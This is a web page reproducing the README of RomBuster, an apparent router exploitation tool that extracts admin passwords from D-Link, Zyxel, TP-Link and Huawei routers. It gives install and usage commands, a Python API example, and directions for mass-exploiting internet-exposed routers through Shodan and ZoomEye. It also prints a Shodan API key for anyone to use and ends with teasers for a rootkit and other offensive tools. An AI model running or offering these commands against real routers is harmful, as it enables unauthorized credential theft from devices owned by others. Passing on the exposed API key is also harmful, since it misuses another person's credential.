RomBuster is a router exploitation tool that allows to disclosure network router admin password.
Features
D-Link
, Zyxel
, TP-Link
and Huawei
.Installation
pip3 install git+https://github.com/EntySec/RomBuster
Basic Usage
To use RomBuster just type rombuster
in your terminal.
usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [–shodan SHODAN]
[–zoomeye ZOOMEYE] [-p PAGES]
RomBuster is a router exploitation tool that allows to disclosure network
router admin password.
optional arguments:
-h, –help show this help message and exit
-o OUTPUT, –output OUTPUT
Output result to file.
-i INPUT, –input INPUT
Input file of addresses.
-a ADDRESS, –address ADDRESS
Single address.
–shodan SHODAN Shodan API key for exploiting devices over Internet.
–zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, –pages PAGES
Number of pages you want to get from ZoomEye.
Examples
Exploiting single router
Let’s hack my router just for fun.
rombuster -a 192.168.99.1
Exploiting routers from Internet
Let’s try to use Shodan search engine to exploit routers over Internet.
rombuster –shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD
) is my PRO API key, you can use this key or your own, be free to use all our resources for free.
Exploiting routers from input file
Let’s try to use opened database of routers.
rombuster -i routers.txt -o passwords.txt
NOTE: It will exploit all routers in routers.txt
list by their addresses and save all obtained passwords to passwords.txt
.
API Usage
RomBuster also has their own Python API that can be invoked by importing RomBuster to your code.
from rombuster import RomBuster
Basic Functions
There are all RomBuster basic functions that can be used to exploit specified router.
exploit(address)
– Exploit single router by given address.
Examples
Exploiting single router
from rombuster import RomBuster
rombuster = RomBuster()
creds = rombuster.exploit(‘192.168.99.100’)
print(creds)
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…
Embark on the journey of becoming a certified Red Team professional with our definitive guide.…
This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…
This took me like 4 days (+2 days for an update), but I got it…
MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…